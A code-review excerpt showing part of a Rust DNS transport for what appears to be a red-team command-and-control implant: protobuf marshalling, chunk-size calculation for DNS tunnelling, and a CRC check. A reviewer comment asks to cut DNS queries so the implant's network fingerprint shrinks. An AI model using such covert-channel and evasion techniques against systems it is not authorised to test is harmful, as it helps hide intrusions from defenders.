implants/lib/transport/src/dns.rs

```diff
@@ -0,0 +1,1594 @@
+
+        Ok(all_data)
+    }
+
+    async fn dns_exchange<Req, Resp>(&mut self, request: Req, method_code: &str) -> Result<Resp>
+    where
+        Req: Message + Send + 'static,
+        Resp: Message + Default + Send + 'static,
+    {
+        // Marshal request
+        let request_data = Self::marshal_with_codec::<Req, Resp>(request)?;
+
+        // Send raw bytes and unmarshal response
+        let response_data = self.dns_exchange_raw(request_data, method_code).await?;
+        Self::unmarshal_with_codec::<Req, Resp>(&response_data)
+    }
+
+    /// Validate request data and calculate optimal chunking strategy
+    fn validate_and_prepare_chunks(&self, request_data: &[u8]) -> Result<(usize, usize, u32)> {
+        // Validate data size
+        if request_data.len() > MAX_DATA_SIZE {
+            return Err(anyhow::anyhow!(
+                "Request data exceeds maximum size: {} bytes > {} bytes",
+                request_data.len(),
+                MAX_DATA_SIZE
+            ));
+        }
+
+        // Calculate exact chunk_size and total_chunks using varint boundary solving
+        // Protobuf varints encode differently based on value:
+        // [1, 127] → 1 byte, [128, 16383] → 2 bytes, [16384, 2097151] → 3 bytes
+        let (chunk_size, total_chunks) = if request_data.is_empty() {
+            (self.calculate_max_chunk_size(1), 1)
+        } else {
+            let varint_ranges = [(1u32, 127u32), (128u32, 16383u32), (16384u32, 2097151u32)];
+
+            let mut result = None;
+            for (min_chunks, max_chunks) in varint_ranges.iter() {
+                // Calculate overhead assuming worst case (max sequence in this range)
+                let chunk_size = self.calculate_max_chunk_size(*max_chunks);
+                let total_chunks = ((request_data.len() + chunk_size - 1) / chunk_size).max(1);
+
+                // Check if the calculated total_chunks falls within this range
+                if total_chunks >= *min_chunks as usize && total_chunks <= *max_chunks as usize {
+                    // Found the correct range - this is exact
+                    result = Some((chunk_size, total_chunks));
+                    break;
+                }
+            }
+
+            // Fallback for very large data
+            result.unwrap_or_else(|| {
+                let chunk_size = self.calculate_max_chunk_size(2097151);
+                let total_chunks = ((request_data.len() + chunk_size - 1) / chunk_size).max(1);
+                (chunk_size, total_chunks)
+            })
+        };
+
+        let data_crc = Self::calculate_crc32(request_data);
+
+        log::debug!(
+            "DNS: Request size={} bytes, chunks={}, chunk_size={} bytes, crc32={:#x}",
+            request_data.len(),
+            total_chunks,
+            chunk_size,
+            data_crc
+        );
+
+        Ok((chunk_size, total_chunks, data_crc))
+    }
+
+    /// Send INIT packet to start a new conversation
+    async fn send_init_packet(
```

Comment:
Can we remove the need for an init packet?
As is i think we're going to send two DNS queries every claimTasks.
If we can cut that in half our network fingerprint will be much smaller.